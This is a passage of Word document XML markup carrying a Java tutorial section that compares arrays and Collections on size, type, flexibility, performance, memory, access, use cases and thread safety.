          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Lis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Se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Queue</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, etc., which can dynamically grow and shrink in size.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CFE9AF" w14:textId="77777777" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00D53FA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62303DB">
          <v:rect id="_x0000_i1429" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B448DB5" w14:textId="77777777" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00D73299" w:rsidP="00D53FA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Size:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FFD15E4" w14:textId="77777777" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00D73299" w:rsidP="00D53FA0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3DD46D" w14:textId="77777777" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00D73299" w:rsidP="00D53FA0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="66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xed Size</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The size of an array is fixed when it is created and cannot be changed. If you need a larger array, you must create a new one and copy the elements.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0B122A" w14:textId="77777777" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00D73299" w:rsidP="00D53FA0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66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llections</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C4DAC9" w14:textId="77777777" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00D73299" w:rsidP="00D53FA0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="66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ynamic Size</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Collections are dynamic in nature, meaning they can grow and shrink in size during runtime. For example, adding or removing elements in a List or Set is allowed without predefining the size.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6009F881" w14:textId="77777777" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00D53FA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57BFB4">
          <v:rect id="_x0000_i1430" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="798F627F" w14:textId="77777777" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00D73299" w:rsidP="00D53FA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Data Type:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC2A916" w14:textId="77777777" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00D73299" w:rsidP="00D53FA0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DD69B7" w14:textId="77777777" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00D73299" w:rsidP="00D53FA0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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omogeneous</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: An array stores elements of a single data type (all elements must be of the same type).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232D5837" w14:textId="77777777" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00D73299" w:rsidP="00D53FA0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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int[], String[], Object[].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9DFB71" w14:textId="77777777" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00D73299" w:rsidP="00D53FA0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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llections</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C3E023" w14:textId="77777777" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00D73299" w:rsidP="00D53FA0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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eterogeneous (for non-generic collections)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Collections can store elements of different data types (in the case of non-generic collections, like Vector or ArrayList before Java 5).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057A8080" w14:textId="77777777" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00D73299" w:rsidP="00D53FA0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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omogeneous (for generic collections)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Modern collections in Java (from Java 5 onwards) are often generic, allowing type-safe collections of elements of the same type, like ArrayList&lt;String&gt; or HashSet&lt;Integer&gt;.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A0638D" w14:textId="77777777" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00D53FA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9621962">
          <v:rect id="_x0000_i1431" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F17E2C6" w14:textId="77777777" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00D73299" w:rsidP="00D53FA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Flexibility:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0263BBDF" w14:textId="77777777" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00D73299" w:rsidP="00D53FA0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472B09E4" w14:textId="77777777" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00D73299" w:rsidP="00D53FA0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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mited Flexibility</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Arrays have limited functionality. For example, they don't provide methods to add, remove, or find elements directly. Operations such as resizing or modifying array elements require manual code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59274C4A" w14:textId="77777777" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00D73299" w:rsidP="00D53FA0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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llections</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A6A945" w14:textId="77777777" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00D73299" w:rsidP="00D53FA0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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ighly Flexible</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Collections provide a wide variety of methods to perform operations such as adding, removing, searching, sorting, and modifying elements, and they automatically handle resizing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB8959B" w14:textId="77777777" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00D53FA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37498E5">
          <v:rect id="_x0000_i1432" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="33503779" w14:textId="77777777" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00D73299" w:rsidP="00D53FA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Performance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276CE078" w14:textId="77777777" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00D73299" w:rsidP="00D53FA0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16EC2853" w14:textId="77777777" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00D73299" w:rsidP="00D53FA0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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aster for fixed-size data</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Since arrays have a fixed size and are stored contiguously in memory, accessing elements by index is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making arrays faster in terms of performance for fixed-size data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CD3ABA0" w14:textId="77777777" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00D73299" w:rsidP="00D53FA0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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llections</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6C1129" w14:textId="77777777" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00D73299" w:rsidP="00D53FA0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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Generally slower</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Collections like ArrayList and LinkedList may incur overhead due to dynamic resizing, resizing operations, and additional features (like bounds checking). However, in practice, collections provide a richer API for flexibility.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FDB2B6F" w14:textId="77777777" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00D53FA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B1A704B">
          <v:rect id="_x0000_i1433" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="261E1D7D" w14:textId="77777777" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00D73299" w:rsidP="00D53FA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Memory Management:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C5E07EB" w14:textId="77777777" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00D73299" w:rsidP="00D53FA0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E62B575" w14:textId="77777777" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00D73299" w:rsidP="00D53FA0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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Memory</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Memory is allocated at the time of array creation, and the size is fixed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BD849B4" w14:textId="77777777" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00D73299" w:rsidP="00D53FA0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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llections</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13907681" w14:textId="77777777" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00D73299" w:rsidP="00D53FA0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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Dynamic Memory</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Collections use dynamic memory allocation, meaning they allocate memory dynamically when elements are added or removed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281EECDC" w14:textId="77777777" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00D53FA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052C4B1">
          <v:rect id="_x0000_i1434" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="45717E07" w14:textId="77777777" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00D73299" w:rsidP="00D53FA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7. Access to Elements:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DFC9EAC" w14:textId="77777777" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00D73299" w:rsidP="00D53FA0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5FF4F0" w14:textId="77777777" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00D73299" w:rsidP="00D53FA0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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irect Access by Index</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Elements in an array can be accessed directly using an index (e.g., array[2]).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F448DD4" w14:textId="77777777" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00D73299" w:rsidP="00D53FA0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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llections</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7401D468" w14:textId="77777777" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00D73299" w:rsidP="00D53FA0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6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direct Access</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Collections may require methods like .get(index) for List or .iterator() for Set or Queue, and cannot always provide direct access by index (e.g., in a HashSet).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="053E842F" w14:textId="77777777" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00D53FA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506CCE">
          <v:rect id="_x0000_i1435" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A61AFDA" w14:textId="77777777" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00D73299" w:rsidP="00D53FA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8. Use Cases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A4218D" w14:textId="77777777" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00D73299" w:rsidP="00D53FA0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A7F284" w14:textId="77777777" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00D73299" w:rsidP="00D53FA0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="66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est suited for </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>fixed-size</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> collections of elements where the size does not need to change, and when performance and speed are critical.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0F990D" w14:textId="77777777" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00D73299" w:rsidP="00D53FA0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="66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Storing the days of the week (String[] days = {"Sunday", "Monday", ...}).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6F8588" w14:textId="77777777" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00D73299" w:rsidP="00D53FA0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66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llections</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736264FB" w14:textId="77777777" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00D73299" w:rsidP="00D53FA0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="66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st suited for dynamic collections of elements that need to grow or shrink, or when you need additional operations like sorting, searching, or modifying data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C8E254" w14:textId="77777777" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00D73299" w:rsidP="00D53FA0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="66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Storing a list of users in a List&lt;User&gt;, or a set of unique IDs in a HashSet&lt;String&gt;.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559F6EC8" w14:textId="77777777" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00D53FA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26ADEA5">
          <v:rect id="_x0000_i1436" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6069C652" w14:textId="77777777" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00D73299" w:rsidP="00D53FA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9. Thread Safety:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54EA258F" w14:textId="77777777" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00D73299" w:rsidP="00D53FA0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35AFBCC3" w14:textId="77777777" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00D73299" w:rsidP="00D53FA0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="66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t thread-safe</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Arrays themselves are not thread-safe unless additional synchronization is applied.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E94834" w14:textId="77777777" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00D73299" w:rsidP="00D53FA0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="66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llections</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D83B1AE" w14:textId="77777777" w:rsidR="00D73299" w:rsidRPr="00CE4B95" w:rsidRDefault="00D73299" w:rsidP="00D53FA0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="66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 Safety (for certain collections)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Some collections, like CopyOnWriteArrayList or ConcurrentHashMap, are thread-safe and designed for concurrent access.</w:t>
      </w:r>
    </w:p>
